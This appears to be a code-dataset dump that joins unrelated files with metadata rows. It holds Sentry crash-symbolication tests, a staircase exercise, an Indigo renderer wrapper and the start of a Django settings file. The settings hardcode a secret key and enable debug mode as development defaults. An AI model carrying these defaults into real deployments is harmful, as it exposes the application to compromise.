"instruction_addr": '0x1',
}]
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_frame_resolution_no_sdk_info(self):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
]
},
"contexts": {
"os": {
"name": "iOS",
"version": "9.3.0"
}
},
"sentry.interfaces.Exception": {
"values": [
{
"stacktrace": {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8"
},
{
"function": "main",
"instruction_addr": 4295098388,
},
{
"function": "other_main",
"instruction_addr": 4295098396
},
{
"platform": "javascript",
"function": "merge",
"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert not frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100020014'
assert frames[1].in_app
assert frames[2].function == 'other_main'
assert frames[2].filename == 'Foo.swift'
assert frames[2].lineno == 82
assert frames[2].colno == 23
assert frames[2].package == object_name
assert frames[2].instruction_addr == '0x10002001c'
assert frames[2].in_app
assert frames[3].platform == 'javascript'
assert frames[3].abs_path == '/scripts/views.js'
assert frames[3].function == 'merge'
assert frames[3].lineno == 268
assert frames[3].colno == 16
assert frames[3].filename == '../../sentry/scripts/views.js'
assert frames[3].in_app
x = bt.get_api_context()
long_frames = x['frames']
assert long_frames[0]['instructionAddr'] == '0x002ac28b8'
assert long_frames[1]['instructionAddr'] == '0x100020014'
assert long_frames[2]['instructionAddr'] == '0x10002001c'
class InAppHonoringResolvingIntegrationTest(TestCase):
    @patch('sentry.lang.native.symbolizer.Symbolizer._symbolize_app_frame')
    def test_frame_resolution(self, symbolize_frame):
        """Client-supplied ``in_app`` flags must be honored over symbolication.

        The payload explicitly marks the system-library frame ``in_app=True``
        and the app frame ``in_app=False``; the asserts below verify those
        explicit flags survive processing instead of being recomputed.
        """
        object_name = (
            "/var/containers/Bundle/Application/"
            "B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
            "SentryTest.app/SentryTest"
        )
        # Canned symbolizer answer used for every app frame.
        symbolize_frame.return_value = [{
            'filename': 'Foo.swift',
            'abs_path': 'Foo.swift',
            'lineno': 42,
            'colno': 23,
            'package': object_name,
            'function': 'real_main',
            'symbol_addr': '0x1000262a0',
            "instruction_addr": '0x100026330',
        }]
        event_data = {
            "sentry.interfaces.User": {
                "ip_address": "31.172.207.97"
            },
            "extra": {},
            "project": self.project.id,
            "platform": "cocoa",
            "debug_meta": {
                "images": [
                    {
                        "type": "apple",
                        "cpu_subtype": 0,
                        "uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
                        "image_vmaddr": 4294967296,
                        "image_addr": 4295098368,
                        "cpu_type": 16777228,
                        "image_size": 32768,
                        "name": object_name,
                    }
                ],
                "sdk_info": {
                    "dsym_type": "macho",
                    "sdk_name": "iOS",
                    "version_major": 9,
                    "version_minor": 3,
                    "version_patchlevel": 0
                }
            },
            "sentry.interfaces.Exception": {
                "values": [
                    {
                        'stacktrace': {
                            "frames": [
                                {
                                    "function": "<redacted>",
                                    "abs_path": None,
                                    "package": "/usr/lib/system/libdyld.dylib",
                                    "filename": None,
                                    "symbol_addr": "0x002ac28b4",
                                    "lineno": None,
                                    "instruction_addr": "0x002ac28b8",
                                    # Explicit client flag (system lib frame).
                                    "in_app": True,
                                },
                                {
                                    "function": "main",
                                    "instruction_addr": 4295123760,
                                    # Explicit client flag (app frame).
                                    "in_app": False,
                                },
                                {
                                    "platform": "javascript",
                                    "function": "merge",
                                    "abs_path": "/scripts/views.js",
                                    "vars": {},
                                    "module": None,
                                    "filename": "../../sentry/scripts/views.js",
                                    "colno": 16,
                                    "in_app": True,
                                    "lineno": 268
                                }
                            ]
                        },
                        "type": "NSRangeException",
                        "mechanism": {
                            "posix_signal": {
                                "signal": 6,
                                "code": 0,
                                "name": "SIGABRT",
                                "code_name": None
                            },
                            "type": "cocoa",
                            "mach_exception": {
                                "subcode": 0,
                                "code": 0,
                                "exception": 10,
                                "exception_name": "EXC_CRASH"
                            }
                        },
                        "value": (
                            "*** -[__NSArray0 objectAtIndex:]: index 3 "
                            "beyond bounds for empty NSArray"
                        )
                    }
                ]
            },
            "contexts": {
                "device": {
                    "model_id": "N102AP",
                    "model": "iPod7,1",
                    "arch": "arm64",
                    "family": "iPod"
                },
                "os": {
                    "version": "9.3.2",
                    "rooted": False,
                    "build": "13F69",
                    "name": "iOS"
                }
            },
            "threads": {
                "values": [
                    {
                        "id": 39,
                        'stacktrace': {
                            "frames": [
                                {
                                    "platform": "apple",
                                    "package": "\/usr\/lib\/system\/libsystem_pthread.dylib",
                                    "symbol_addr": "0x00000001843a102c",
                                    "image_addr": "0x00000001843a0000",
                                    "instruction_addr": "0x00000001843a1530"
                                },
                                {
                                    "platform": "apple",
                                    "package": "\/usr\/lib\/system\/libsystem_kernel.dylib",
                                    "symbol_addr": "0x00000001842d8b40",
                                    "image_addr": "0x00000001842bc000",
                                    "instruction_addr": "0x00000001842d8b48"
                                }
                            ]
                        },
                        "crashed": False,
                        "current": False
                    }
                ]
            }
        }

        resp = self._postWithHeader(event_data)
        assert resp.status_code == 200

        event = Event.objects.get()
        bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
        frames = bt.frames

        # System frame stays in_app=True as the client requested.
        assert frames[0].function == '<redacted>'
        assert frames[0].instruction_addr == '0x2ac28b8'
        assert frames[0].in_app

        # App frame is symbolicated but keeps the client's in_app=False.
        assert frames[1].function == 'real_main'
        assert frames[1].filename == 'Foo.swift'
        assert frames[1].lineno == 42
        assert frames[1].colno == 23
        assert frames[1].package == object_name
        assert frames[1].instruction_addr == '0x100026330'
        assert not frames[1].in_app

        # Javascript frame passes through unchanged.
        assert frames[2].platform == 'javascript'
        assert frames[2].abs_path == '/scripts/views.js'
        assert frames[2].function == 'merge'
        assert frames[2].lineno == 268
        assert frames[2].colno == 16
        assert frames[2].filename == '../../sentry/scripts/views.js'
        assert frames[2].in_app

        assert len(event.interfaces['threads'].values) == 1
def sym_app_frame(self, instruction_addr, img, sdk_info=None):
    """Stub symbolizer: addresses in [4295098384, 4295098388) resolve to
    ``real_main``; anything else resolves to ``other_main``."""
    object_name = (
        "/var/containers/Bundle/Application/"
        "B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
        "SentryTest.app/SentryTest"
    )
    addr = parse_addr(instruction_addr)
    if 4295098384 <= addr < 4295098388:
        return [{
            'filename': 'Foo.swift',
            'abs_path': 'Foo.swift',
            'lineno': 42,
            'colno': 23,
            'package': object_name,
            'function': 'real_main',
            'symbol_addr': '0x1000262a0',
            "instruction_addr": '0x100026330',
        }]
    return [{
        'filename': 'Foo.swift',
        'abs_path': 'Foo.swift',
        'lineno': 82,
        'colno': 23,
        'package': object_name,
        'function': 'other_main',
        'symbol_addr': '0x1',
        "instruction_addr": '0x1',
    }]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_frame_resolution_no_sdk_info(self):
    """Symbolicate a cocoa event that carries no debug_meta sdk_info.

    Frames at addresses 4295098388/4295098396 are resolved by the patched
    sym_app_frame fake; system-library and javascript frames pass through.
    """
    object_name = (
        "/var/containers/Bundle/Application/"
        "B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
        "SentryTest.app/SentryTest"
    )
    # NOTE(review): "contexts" appears twice in this literal — the second
    # (device/os) dict silently overwrites the first (os-only) one.
    event_data = {
        "sentry.interfaces.User": {
            "ip_address": "31.172.207.97"
        },
        "extra": {},
        "project": self.project.id,
        "platform": "cocoa",
        "debug_meta": {
            "images": [
                {
                    "type": "apple",
                    "cpu_subtype": 0,
                    "uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
                    "image_vmaddr": 4294967296,
                    "image_addr": 4295098368,
                    "cpu_type": 16777228,
                    "image_size": 32768,
                    "name": object_name,
                }
            ]
        },
        "contexts": {
            "os": {
                "name": "iOS",
                "version": "9.3.0"
            }
        },
        "sentry.interfaces.Exception": {
            "values": [
                {
                    "stacktrace": {
                        "frames": [
                            {
                                "function": "<redacted>",
                                "abs_path": None,
                                "package": "/usr/lib/system/libdyld.dylib",
                                "filename": None,
                                "symbol_addr": "0x002ac28b4",
                                "lineno": None,
                                "instruction_addr": "0x002ac28b8"
                            },
                            {
                                # Resolved to real_main by sym_app_frame.
                                "function": "main",
                                "instruction_addr": 4295098388,
                            },
                            {
                                # Outside the window -> other_main.
                                "function": "other_main",
                                "instruction_addr": 4295098396
                            },
                            {
                                # Non-native frame: must be left untouched.
                                "platform": "javascript",
                                "function": "merge",
                                "abs_path": "/scripts/views.js",
                                "vars": {},
                                "module": None,
                                "filename": "../../sentry/scripts/views.js",
                                "colno": 16,
                                "in_app": True,
                                "lineno": 268
                            }
                        ]
                    },
                    "type": "NSRangeException",
                    "mechanism": {
                        "posix_signal": {
                            "signal": 6,
                            "code": 0,
                            "name": "SIGABRT",
                            "code_name": None
                        },
                        "type": "cocoa",
                        "mach_exception": {
                            "subcode": 0,
                            "code": 0,
                            "exception": 10,
                            "exception_name": "EXC_CRASH"
                        }
                    },
                    "value": (
                        "*** -[__NSArray0 objectAtIndex:]: index 3 "
                        "beyond bounds for empty NSArray"
                    )
                }
            ]
        },
        "contexts": {
            "device": {
                "model_id": "N102AP",
                "model": "iPod7,1",
                "arch": "arm64",
                "family": "iPod"
            },
            "os": {
                "version": "9.3.2",
                "rooted": False,
                "build": "13F69",
                "name": "iOS"
            }
        }
    }
    resp = self._postWithHeader(event_data)
    assert resp.status_code == 200
    event = Event.objects.get()
    bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
    frames = bt.frames
    assert frames[0].function == '<redacted>'
    assert frames[0].instruction_addr == '0x2ac28b8'
    assert not frames[0].in_app
    assert frames[1].function == 'real_main'
    assert frames[1].filename == 'Foo.swift'
    assert frames[1].lineno == 42
    assert frames[1].colno == 23
    assert frames[1].package == object_name
    assert frames[1].instruction_addr == '0x100020014'
    assert frames[1].in_app
    assert frames[2].function == 'other_main'
    assert frames[2].filename == 'Foo.swift'
    assert frames[2].lineno == 82
    assert frames[2].colno == 23
    assert frames[2].package == object_name
    assert frames[2].instruction_addr == '0x10002001c'
    assert frames[2].in_app
    assert frames[3].platform == 'javascript'
    assert frames[3].abs_path == '/scripts/views.js'
    assert frames[3].function == 'merge'
    assert frames[3].lineno == 268
    assert frames[3].colno == 16
    assert frames[3].filename == '../../sentry/scripts/views.js'
    assert frames[3].in_app
    # The API representation keeps the full-width instruction addresses.
    x = bt.get_api_context()
    long_frames = x['frames']
    assert long_frames[0]['instructionAddr'] == '0x002ac28b8'
    assert long_frames[1]['instructionAddr'] == '0x100020014'
    assert long_frames[2]['instructionAddr'] == '0x10002001c'
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_in_app_function_name(self):
    """Frames whose function names match the crash-reporter SDK markers
    (kscm_, kscrash_, 'KSCrash ', 'SentryClient ', 'RNSentry ') are
    demoted to not-in-app; near-miss names stay in-app.
    """
    object_name = (
        "/var/containers/Bundle/Application/"
        "B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
        "SentryTest.app/SentryTest"
    )
    # Every frame is identical except for its function name; the first
    # five match an SDK marker, the last two only almost match.
    function_names = [
        "[RNSentry ]",
        "[SentryClient ]",
        "[kscrash_]",
        "[kscm_]",
        "[KSCrash ]",
        "[KSCrash]",
        "[KSCrashy]",
    ]
    input_frames = [
        {
            "function": function_name,
            "abs_path": None,
            "package": "/usr/lib/system/libdyld.dylib",
            "filename": None,
            "symbol_addr": "0x002ac28b4",
            "lineno": None,
            "instruction_addr": 4295098388,
        }
        for function_name in function_names
    ]
    event_data = {
        "sentry.interfaces.User": {
            "ip_address": "31.172.207.97"
        },
        "extra": {},
        "project": self.project.id,
        "platform": "cocoa",
        "debug_meta": {
            "images": [
                {
                    "type": "apple",
                    "cpu_subtype": 0,
                    "uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
                    "image_vmaddr": 4294967296,
                    "image_addr": 4295098368,
                    "cpu_type": 16777228,
                    "image_size": 32768,
                    "name": object_name,
                }
            ]
        },
        "contexts": {
            "os": {
                "name": "iOS",
                "version": "9.3.0"
            }
        },
        "sentry.interfaces.Exception": {
            "values": [
                {
                    "stacktrace": {"frames": input_frames},
                    "type": "NSRangeException",
                    "mechanism": {
                        "posix_signal": {
                            "signal": 6,
                            "code": 0,
                            "name": "SIGABRT",
                            "code_name": None
                        },
                        "type": "cocoa",
                        "mach_exception": {
                            "subcode": 0,
                            "code": 0,
                            "exception": 10,
                            "exception_name": "EXC_CRASH"
                        }
                    },
                    "value": (
                        "*** -[__NSArray0 objectAtIndex:]: index 3 "
                        "beyond bounds for empty NSArray"
                    )
                }
            ]
        },
        "contexts": {
            "device": {
                "model_id": "N102AP",
                "model": "iPod7,1",
                "arch": "arm64",
                "family": "iPod"
            },
            "os": {
                "version": "9.3.2",
                "rooted": False,
                "build": "13F69",
                "name": "iOS"
            }
        }
    }
    resp = self._postWithHeader(event_data)
    assert resp.status_code == 200
    event = Event.objects.get()
    bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
    frames = bt.frames
    # Frames 0-4 match an SDK marker and are demoted; 5 and 6 do not.
    for index in range(5):
        assert not frames[index].in_app
    assert frames[5].in_app
    assert frames[6].in_app
def sym_mac_app_frame(self, instruction_addr, img, sdk_info=None):
    """Fake macOS symbolizer hook: a single 4-byte window resolves to
    ``real_main``; anything else resolves to ``other_main``."""
    object_name = (
        "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/"
        "CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/"
        "CrashProbe.app/Contents/Frameworks/"
        "CrashLib.framework/Versions/A/CrashLib"
    )
    addr = parse_addr(instruction_addr)
    if 4295098384 <= addr < 4295098388:
        return [{
            'filename': 'Foo.swift',
            'abs_path': 'Foo.swift',
            'lineno': 42,
            'colno': 23,
            'package': object_name,
            'function': 'real_main',
            'symbol_addr': '0x1000262a0',
            "instruction_addr": '0x100026330',
        }]
    return [{
        'filename': 'Foo.swift',
        'abs_path': 'Foo.swift',
        'lineno': 82,
        'colno': 23,
        'package': object_name,
        'function': 'other_main',
        'symbol_addr': '0x1',
        "instruction_addr": '0x1',
    }]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_mac_app_frame)
def test_in_app_macos(self):
    """A macOS app frame inside the bundled CrashLib framework must be
    classified as in-app after symbolication."""
    object_name = (
        "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/"
        "CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/"
        "CrashProbe.app/Contents/Frameworks/"
        "CrashLib.framework/Versions/A/CrashLib"
    )
    event_data = {
        "sentry.interfaces.User": {
            "ip_address": "31.172.207.97"
        },
        "extra": {},
        "project": self.project.id,
        "platform": "cocoa",
        "debug_meta": {
            "images": [
                {
                    "type": "apple",
                    "cpu_subtype": 0,
                    "uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
                    "image_vmaddr": 4294967296,
                    "image_addr": 4295098368,
                    "cpu_type": 16777228,
                    "image_size": 32768,
                    "name": object_name,
                }
            ]
        },
        "sentry.interfaces.Exception": {
            "values": [
                {
                    "stacktrace": {
                        "frames": [
                            {
                                # App frame at the address sym_mac_app_frame resolves.
                                "function": "-[CRLCrashAsyncSafeThread crash]",
                                "abs_path": "/Users/haza/Projects/getsentry-CrashProbe/CrashProbe/CRLCrashAsyncSafeThread.m",
                                "package": "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/CrashProbe.app/Contents/Frameworks/CrashLib.framework/Versions/A/CrashLib",
                                "image_addr": "0x110121000",
                                "symbol_addr": "0x110122303",
                                "instruction_addr": 4295098388
                            },
                            {
                                # Crash-reporter SDK frame in a system library.
                                "function": "[KSCrash ]",
                                "abs_path": None,
                                "package": "/usr/lib/system/libdyld.dylib",
                                "filename": None,
                                "symbol_addr": "0x002ac28b4",
                                "lineno": None,
                                "instruction_addr": 4295098388,
                            },
                        ]
                    },
                    "type": "NSRangeException",
                    "mechanism": {
                        "posix_signal": {
                            "signal": 6,
                            "code": 0,
                            "name": "SIGABRT",
                            "code_name": None
                        },
                        "type": "cocoa",
                        "mach_exception": {
                            "subcode": 0,
                            "code": 0,
                            "exception": 10,
                            "exception_name": "EXC_CRASH"
                        }
                    },
                    "value": (
                        "*** -[__NSArray0 objectAtIndex:]: index 3 "
                        "beyond bounds for empty NSArray"
                    )
                }
            ]
        },
        "contexts": {
            "device": {
                "family": "macOS",
                "type": "device",
                "storage_size": 498954403840,
                "free_memory": 415174656,
                "memory_size": 17179869184,
                "boot_time": "2017-06-18T07:10:05Z",
                "model": "MacBookPro13,1",
                "usable_memory": 15204716544,
                "arch": "x86"
            },
            "app": {
                "app_version": "1.0",
                "app_name": "CrashProbe",
                "device_app_hash": "75e22adcce6cb4c81db7c7e623c2f2721616d2c8",
                "executable_path": "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/CrashProbe.app/CrashProbe",
                "build_type": "unknown",
                "app_start_time": "2017-06-19T07:19:02Z",
                "app_identifier": "net.hockeyapp.CrashProbe",
                "type": "app",
                "app_build": "1"
            },
            "os": {
                "rooted": False,
                "kernel_version": "Darwin Kernel Version 16.6.0: Fri Apr 14 16:21:16 PDT 2017; root:xnu-3789.60.24~6/RELEASE_X86_64",
                "version": "10.12.5",
                "build": "16F73",
                "type": "os",
                "name": "macOS"
            }
        },
    }
    resp = self._postWithHeader(event_data)
    assert resp.status_code == 200
    event = Event.objects.get()
    bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
    frames = bt.frames
    assert frames[0].in_app
class RealResolvingIntegrationTest(TestCase):
    """End-to-end test: upload a real dSYM bundle, then symbolicate an
    event against it (no mocked symbolizer)."""

    def test_real_resolving(self):
        url = reverse(
            'sentry-api-0-dsym-files',
            kwargs={
                'organization_slug': self.project.organization.slug,
                'project_slug': self.project.slug,
            }
        )
        self.login_as(user=self.user)

        # Package the fixture dSYM into an in-memory zip, as the upload
        # endpoint expects an archive.
        out = BytesIO()
        f = zipfile.ZipFile(out, 'w')
        f.write(os.path.join(os.path.dirname(__file__), 'fixtures', 'hello.dsym'),
                'dSYM/hello')
        f.close()

        response = self.client.post(
            url, {
                'file':
                SimpleUploadedFile('symbols.zip', out.getvalue(), content_type='application/zip'),
            },
            format='multipart'
        )
        assert response.status_code == 201, response.content
        assert len(response.data) == 1

        # The image uuid/addresses match the uploaded hello.dsym.
        event_data = {
            "project": self.project.id,
            "platform": "cocoa",
            "debug_meta": {
                "images": [{
                    "type": "apple",
                    "arch": "x86_64",
                    "uuid": "502fc0a5-1ec1-3e47-9998-684fa139dca7",
                    "image_vmaddr": "0x0000000100000000",
                    "image_size": 4096,
                    "image_addr": "0x0000000100000000",
                    "name": "Foo.app/Contents/Foo"
                }],
                "sdk_info": {
                    "dsym_type": "macho",
                    "sdk_name": "macOS",
                    "version_major": 10,
                    "version_minor": 12,
                    "version_patchlevel": 4,
                }
            },
            "sentry.interfaces.Exception": {
                "values": [
                    {
                        'stacktrace': {
                            "frames": [
                                {
                                    "function": "unknown",
                                    "instruction_addr": "0x0000000100000fa0"
                                },
                            ]
                        },
                        "type": "Fail",
                        "value": "fail"
                    }
                ]
            },
        }
        resp = self._postWithHeader(event_data)
        assert resp.status_code == 200

        # The 'unknown' frame must now resolve via the uploaded dSYM.
        event = Event.objects.get()
        bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
        frames = bt.frames
        assert frames[0].function == 'main'
        assert frames[0].filename == 'hello.c'
        assert frames[0].abs_path == '/tmp/hello.c'
        assert frames[0].lineno == 1
| 39.655635 | 240 | 0.363505 |
795acdf6f20909fabc83470fbd7e4a759e712ef9 | 579 | py | Python | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | '''
Consider a staircase of size :
#
##
###
####
Observe that its base and height are both equal to n=4, and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces.
Write a program that prints a staircase of size .
'''
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the staircase function below.
def staircase(n):
    """Print a right-aligned staircase of '#' characters with height n."""
    for step in range(1, n + 1):
        print(("#" * step).rjust(n))
if __name__ == '__main__':
    # Read the staircase height from stdin and draw it.
    staircase(int(input()))
| 17.545455 | 151 | 0.625216 |
795ace79a4aa5aab942ee64f94c4f266d95e2e6a | 5,844 | py | Python | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) from 2009 to Present EPAM Systems.
#
# This file is part of Indigo toolkit.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import platform
from ctypes import CDLL, POINTER, c_char_p, c_int
from indigo import IndigoException, DECODE_ENCODING
class IndigoRenderer(object):
    """ctypes wrapper around the native Indigo renderer shared library.

    Loads the platform-specific library from the Indigo session's DLL
    directory, declares the C function prototypes, and exposes rendering
    helpers that mirror the C API.
    """

    def __init__(self, indigo):
        """Load the renderer library and initialize the render context.

        Args:
            indigo: active Indigo session; its ``_dll_dir`` locates the
                native libraries and its session id scopes all calls.

        Raises:
            IndigoException: if the operating system is unsupported.
        """
        # Set this first so __del__ is safe even if construction fails
        # below (e.g. unsupported OS raises before the old code ever
        # assigned _initialized, making __del__ raise AttributeError).
        self._initialized = False
        self.indigo = indigo

        if (
            os.name == "posix"
            and not platform.mac_ver()[0]
            and not platform.system().startswith("CYGWIN")
        ):
            self._lib = CDLL(indigo._dll_dir + "/libindigo-renderer.so")
        elif os.name == "nt" or platform.system().startswith("CYGWIN"):
            self._lib = CDLL(indigo._dll_dir + "/indigo-renderer.dll")
        elif platform.mac_ver()[0]:
            self._lib = CDLL(indigo._dll_dir + "/libindigo-renderer.dylib")
        else:
            raise IndigoException("unsupported OS: " + os.name)

        # Declare prototypes so ctypes marshals arguments and results.
        self._lib.indigoRendererInit.restype = c_int
        self._lib.indigoRendererInit.argtypes = []
        self._lib.indigoRendererDispose.restype = c_int
        self._lib.indigoRendererDispose.argtypes = []
        self._lib.indigoRender.restype = c_int
        self._lib.indigoRender.argtypes = [c_int, c_int]
        self._lib.indigoRenderToFile.restype = c_int
        self._lib.indigoRenderToFile.argtypes = [c_int, c_char_p]
        self._lib.indigoRenderGrid.restype = c_int
        self._lib.indigoRenderGrid.argtypes = [
            c_int,
            POINTER(c_int),
            c_int,
            c_int,
        ]
        self._lib.indigoRenderGridToFile.restype = c_int
        self._lib.indigoRenderGridToFile.argtypes = [
            c_int,
            POINTER(c_int),
            c_int,
            c_char_p,
        ]
        self._lib.indigoRenderReset.restype = c_int
        self._lib.indigoRenderReset.argtypes = []

        # Init context
        self.indigo._setSessionId()
        self.indigo._checkResult(self._lib.indigoRendererInit())
        self._initialized = True

    def __del__(self):
        # getattr guard: __init__ may have raised before any attribute
        # was set, and __del__ still runs on the partially-built object.
        if getattr(self, "_initialized", False):
            self.indigo._setSessionId()
            self.indigo._checkResult(self._lib.indigoRendererDispose())
            self._initialized = False

    @staticmethod
    def _refatoms_array(objects, refatoms, caller):
        """Validate refatoms against the object count and pack them into a
        ctypes int array (or return None when refatoms is falsy)."""
        if not refatoms:
            return None
        if len(refatoms) != objects.count():
            raise IndigoException(
                "%s(): refatoms[] size must be equal to the number of objects"
                % caller
            )
        return (c_int * len(refatoms))(*refatoms)

    def renderToBuffer(self, obj):
        """Renders object to buffer

        Args:
            obj (IndigoObject): object to render

        Returns:
            list: buffer with byte array
        """
        self.indigo._setSessionId()
        wb = self.indigo.writeBuffer()
        try:
            self.indigo._checkResult(self._lib.indigoRender(obj.id, wb.id))
            return wb.toBuffer()
        finally:
            wb.dispose()

    def renderToString(self, obj):
        """Renders object to string

        Args:
            obj (IndigoObject): object to render

        Returns:
            str: string with rendered data
        """
        return self.renderToBuffer(obj).tobytes().decode(DECODE_ENCODING)

    def renderToFile(self, obj, filename):
        """Renders to file

        Args:
            obj (IndigoObject): object to render
            filename (str): full file path (must be ASCII-encodable)
        """
        self.indigo._setSessionId()
        self.indigo._checkResult(
            self._lib.indigoRenderToFile(obj.id, filename.encode("ascii"))
        )

    def renderGridToFile(self, objects, refatoms, ncolumns, filename):
        """Renders grid to file

        Args:
            objects (IndigoObject): array of objects
            refatoms (list): array or reference atoms
            ncolumns (int): number of columns
            filename (str): full file path (must be ASCII-encodable)

        Raises:
            IndigoException: if refatoms does not match the object count
        """
        self.indigo._setSessionId()
        arr = self._refatoms_array(objects, refatoms, "renderGridToFile")
        self.indigo._checkResult(
            self._lib.indigoRenderGridToFile(
                objects.id, arr, ncolumns, filename.encode("ascii")
            )
        )

    def renderGridToBuffer(self, objects, refatoms, ncolumns):
        """Renders grid to buffer

        Args:
            objects (IndigoObject): array of objects
            refatoms (list): array or reference atoms
            ncolumns (int): number of columns

        Raises:
            IndigoException: if refatoms does not match the object count

        Returns:
            list: buffer byte array
        """
        self.indigo._setSessionId()
        arr = self._refatoms_array(objects, refatoms, "renderGridToBuffer")
        wb = self.indigo.writeBuffer()
        try:
            self.indigo._checkResult(
                self._lib.indigoRenderGrid(objects.id, arr, ncolumns, wb.id)
            )
            return wb.toBuffer()
        finally:
            wb.dispose()
| 33.204545 | 98 | 0.592231 |
795ace88e1de4748df2b96a4d104c86ca5c4f848 | 3,092 | py | Python | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2pydqxr4++(fq1n99_sm4r9f^^2hd)k=c3we-qbx)(%il@+2gp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
